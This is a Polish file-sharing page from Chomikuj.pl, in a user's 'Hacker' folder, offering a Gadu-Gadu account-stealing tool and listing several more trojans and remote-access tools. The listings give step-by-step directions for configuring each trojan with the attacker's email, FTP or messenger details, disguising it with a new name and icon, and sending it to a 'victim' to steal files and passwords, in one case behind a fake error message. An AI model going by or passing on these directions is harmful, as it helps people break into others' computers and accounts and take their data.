Wykorzystujemy pliki cookies i podobne technologie w celu usprawnienia korzystania z serwisu Chomikuj.pl oraz wyświetlenia reklam dopasowanych do Twoich potrzeb.

Jeśli nie zmienisz ustawień dotyczących cookies w Twojej przeglądarce, wyrażasz zgodę na ich umieszczanie na Twoim komputerze przez administratora serwisu Chomikuj.pl – Kelo Corporation.

W każdej chwili możesz zmienić swoje ustawienia dotyczące cookies w swojej przeglądarce internetowej. Dowiedz się więcej w naszej Polityce Prywatności - http://chomikuj.pl/PolitykaPrywatnosci.aspx.

Jednocześnie informujemy że zmiana ustawień przeglądarki może spowodować ograniczenie korzystania ze strony Chomikuj.pl.

W przypadku braku twojej zgody na akceptację cookies niestety prosimy o opuszczenie serwisu chomikuj.pl.

Wykorzystanie plików cookies przez Zaufanych Partnerów (dostosowanie reklam do Twoich potrzeb, analiza skuteczności działań marketingowych).

Wyrażam sprzeciw na cookies Zaufanych Partnerów
NIE TAK

Wyrażenie sprzeciwu spowoduje, że wyświetlana Ci reklama nie będzie dopasowana do Twoich preferencji, a będzie to reklama wyświetlona przypadkowo.

Istnieje możliwość zmiany ustawień przeglądarki internetowej w sposób uniemożliwiający przechowywanie plików cookies na urządzeniu końcowym. Można również usunąć pliki cookies, dokonując odpowiednich zmian w ustawieniach przeglądarki internetowej.

Pełną informację na ten temat znajdziesz pod adresem http://chomikuj.pl/PolitykaPrywatnosci.aspx.

Nie masz jeszcze własnego chomika? Załóż konto

Złodziej GG v1.1.rar

kwik129 / Hacker / Złodziej GG v1.1.rar
Download: Złodziej GG v1.1.rar

354 KB

0.0 / 5 (0 głosów)
Program do wykradania komuś gg :-) wykrywalny niestety hasło do archiwum neorator

Komentarze:

Nie ma jeszcze żadnego komentarza. Dodaj go jako pierwszy!

Aby dodawać komentarze musisz się zalogować

Inne pliki do pobrania z tego chomika
Znakomity program do łamania haseł. Zobacz co potrafi, sprawdź listę dostępnych rozszerzeń plików Excel Word Windows QuickBooks Access FileMaker Outlook Outlook Express Exchange WinZip PKZip ZIP WinRAR RAR Network Connections SQL BestCrypt OneNote PowerPoint VBA Visual Basic modules Internet Explorer EFS - Encrypted File System Acrobat Quicken Lotus 1-2-3 Lotus Notes Lotus Organizer Lotus WordPro Quattro Pro Backup Project MYOB Peachtree Paradox ACT! Mail Schedule+ Money WordPerfect
Bardzo dobry i niewykrywalny progrmaiok do robienia zrzutów ekranuco określony czas możliwośc robienia zrzutu nawet co 5s bardzo sie przydfaje jak chcemy wiedzieć co sie dzieja na naszym kompie podczas naszej nieobecności
Obsługa programu: 1. Program złodziej służy do wykradania plików (małych) 2. Ściągamy skompresowany plik o nazwie Złodziej.zip 3. Dekompresujemy ten plik i wchodzimy do folderu. 4. Odpalamy plik o nazwie konfigurator.exe Uruchamia się program widziany na screenie: obrazek5. W konfiguratorze podajemy e-mail na który ma zostać wysłany plik i lokacje pliku np: gdy chcemy ściągnąć od kogoś plik to podajemy swój e-mail i dowiadujemy się gdzie znajduje się plik który chcemy ściągnąć.Jeżeli ktoś np: posiada plik haslo.txt to musimy się dowiedzieć gdzie go trzyma np: C:\haslo.txt wpisujemy to w lokacje! WPISYWAĆ DOKŁADNIE! Klikamy Generuj. Powstaje Plik.exe (czyli trojan), możemy zmienić nazwę, ikonę i wysyłać ofiarze. 6. PLIK JEST NIEGROŹNY!!! po odpaleniu trojana wyskakuje fałszywy błąd: ERROR 615632187x Nie znaleziono taskmgr.dll który ma wprowadzić w błąd. Program wysyła podany plik z lokacji na e-mail i się wyłącza...
Obsługa programu: 1. Parszywiec działa na porcie 3023, i jak narazie nie dodaje się do rejestru. Posiada następujące funkcje: przeszukiwanie dysków, wysyłanie pliku na FTP 2. Ściągamy skompresowany plik o nazwie Parszywiec 1.1.zip 3. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: parszywiec_k.exe, parszywiec_s.exe 4. Plik o nazwie Parszywiec_s.exe (czyli plik serwer) musimy podrzucić naszej ofiarze. 5. My zaś otwieramy plik o nazwie parszywiec_k.exe (czyli plik client). Uruchamia się program widziany na screenie w którym podajemy adres IP i klikamy na połącz. obrazek
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie Katiusz 2.zip 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy plik: katiusz2.1.exe 3. Plik o nazwie katiusz2.1.exe odpalamy u siebie. Uruchamia się program widziany na screenie: obrazek4. Teraz musisz stworzyć trojana (plik serwer), który podrzucisz do swojej ofiary. Aby to zrobić klikasz na zakładkę "Konfiguracja". Teraz uzupełnisz wszystkie ramki i klikasz na Generuj. Powstaje trojan :) 5. Teraz wysyłasz go do ofiary. Ofiara musi go otworzyć.
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie "BiG BeN GG 2.0.zip" 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: BiG Ben GG Server 2.0.exe, BiG Ben GG v2.0 KillServer.exe, GGPassCrack.exe, Konfigurator BiG Ben GG v2.0.exe, Opis+komendy.txt 3. Otwieramy u siebie plik o nazwie Konfigurator BiG Ben GG v2.0.exe Program ten służy do odpowiedniego skonfigurowania trojana. Uruchamia się program widziany na screenie: obrazekUzupełniamy wszystkie ramki: Edycja serwera: Numer GG servera - tworzymy nowy numer GG i podajemy ten numer. Ponadto zapisujemy go u siebie na liście kontaktów, bo będzie potrzebny ;] Hasło GG servera - wpisujemy hasło do nowo założonego numeru Numer GG klienta - tu wpisujemy własny numer GG to na niego będziemy dostawać info z servera E-mail: Wyślij na e-mail - tu wpisujemy na jaki mail mamy dostawać plik "config.dat" Wyślij z e-mail - w to pole wpisujemy pelny mail z jakiego będziemy wysyłać plik "config.dat Host E-mail - w to pole wpisujemy host poczty np: poczta.interia.pl Login - w to pole wpisujemy login jaki używamy do zalogowania na e-mail Hasło E-mail - hasło jakiego używamy do logowania na e-mail FTP: Host FTP - w to pole wpisujemy host do ftp Port FTP - określamy port na jakim działa ftp Login - podajemy login do naszego ftp Hasło FTP - hasło dostępowe do servera ftp Jak już wszystko ładnie uzupełnimy to klikamy na opcję "Zapisz" Gotowe. nasz plik serwer (czyli plik BiG Ben GG Server 2.0.exe) został skonfigurowany :) 4. Teraz wysyłamy plik BiG Ben GG Server 2.0.exe do naszej ofiary. Oczywiste jest że ofiara musi go otworzyć, a antywirus nie zabić..... 5. Następnie otwieramy program Gadu-Gadu i wysyłamy odpowiednią komendę na numer serwera. Spis komend znajdziesz w paczce w pliku "Opis + komendy.txt"
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie "CAFEiNi 1.1.zip" 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: CaFEiNclient.exe, CaFEiNconfig.exe, CaFEiNserver.exe 3. Najpierw odpalamy u siebie plik o nazwie CaFEiNconfig.exe za pomocą którego skonfigurujemy odpowiednio nasz plik server. Uruchomi się program widziany na screenie: obrazek Kiedy już wszystko ustawimy i uzupełnimy ramki klikamy na opcję: "Zapisz ustawienia do servera". Gotowe :) 4. Teraz plik CaFEiNserver.exe (czyli serwer) wysyłamy do naszej ofiary. 5. My zaś otwieramy plik CaFEiNclient.exe (czyli client). Uruchomi się program widziany na screenie, w którym podajemy adres IP lub HOST naszej ofiary i klikamy na "Połącz" obrazek
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie "Big Ben 2.5.zip" 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: Big Ben v.2.5 Klient.exe, Big Ben v.2.5 Server.exe 3. Plik o nazwie Big Ben v.2.5 Server.exe podrzucamy naszej ofiarze. 4. My zaś otwieramy plik Big Ben v.2.5 Klient.exe. Uruchomi się program widziany na screenie, w którym podajemy adres IP ofiary i klikamy na "Połącz" obrazek
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie "AntiMks 0.1 beta.zip" 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: AntiMks.exe, Setup.exe 2. Plik Setup.exe (czyli server) podrzucamy naszej ofiarze. 3. My zaś otwieramy plik AntiMks.exe za pomocą którego połączymy się z zainfekowanym komputerem (zakładka "Połącznie"). Uruchamia się program widziany na screenie: <a><a><a>obrazek
więcej plików z tego folderu...
Zgłoś jeśli naruszono regulamin
W ramach Chomikuj.pl stosujemy pliki cookies by umożliwić Ci wygodne korzystanie z serwisu. Jeśli nie zmienisz ustawień dotyczących cookies w Twojej przeglądarce, będą one umieszczane na Twoim komputerze. W każdej chwili możesz zmienić swoje ustawienia. Dowiedz się więcej w naszej Polityce Prywatności